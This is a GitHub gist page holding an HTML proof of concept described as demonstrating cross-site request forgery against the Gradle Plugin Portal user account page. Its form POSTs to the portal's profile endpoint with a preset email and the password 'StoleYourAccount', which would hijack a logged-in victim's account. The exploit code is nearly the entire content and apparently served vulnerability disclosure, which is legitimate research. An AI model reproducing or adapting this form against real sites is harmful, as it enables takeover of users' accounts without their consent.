Created
November 1, 2018 17:58
-
-
Save JLLeitschuh/39cadc04cbe32b7b72298136df0bfd77 to your computer and use it in GitHub Desktop.
Demonstrates CSRF against the Gradle Plugin Portal user account page
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="UTF-8"?> | |
| <html> | |
| <head></head> | |
| <body> | |
| <form action="https://plugins.gradle.org/user" method="POST" class="edit-profile-form" _lpchecked="1"> | |
| <dl id="name_field"> | |
| <dt> | |
| <label for="name"></label> | |
| </dt> | |
| <dd> | |
| <input type="text" id="name" name="name" value="Change Your name" class="form-control" placeholder="Full name"/> | |
| </dd> | |
| </dl> | |
| <dl class=" " id="email_field"> | |
| <dt> | |
| <label for="email"> | |
| </label> | |
| </dt> | |
| <dd> | |
| <input type="text" id="email" name="email" value="[email protected]" class="form-control" placeholder="Email address"/> | |
| </dd> | |
| </dl> | |
| <dl class=" " id="password1_field"> | |
| <dt> | |
| <label for="password1">Password</label> | |
| </dt> | |
| <dd> | |
| <input id="password1" name="password1" class="form-control" value="StoleYourAccount" placeholder="Password"/> | |
| </dd> | |
| </dl> | |
| <dl class=" " id="password2_field"> | |
| <dt> | |
| <label for="password2">Password Again</label> | |
| </dt> | |
| <dd> | |
| <input id="password2" name="password2" class="form-control" value="StoleYourAccount" placeholder="Confirm password"/> | |
| </dd> | |
| </dl> | |
| <input id="submit" class="btn btn-primary" type="submit" value="Update Profile"/> | |
| </form> | |
| </body> | |
| </html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment